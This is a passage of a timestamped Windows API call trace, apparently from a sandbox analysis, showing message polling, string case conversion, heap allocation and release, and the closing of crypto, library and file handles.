lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.533] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.533] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.533] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.533] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.533] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.533] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.533] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.534] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.534] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.534] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.534] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.534] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.534] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.534] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.534] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.535] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.535] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.535] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.535] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.535] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.535] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.535] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.535] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.536] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.536] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.536] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.536] CryptReleaseContext (hProv=0xad2720, dwFlags=0x0) returned 1 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0244.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0244.539] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0244.539] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0244.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0244.539] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0244.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0244.540] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0244.540] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0244.540] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0244.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0244.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.541] FreeLibrary (hLibModule=0x74d40000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0244.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.542] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.542] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0244.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0244.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.544] CloseHandle (hObject=0x2c8) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree 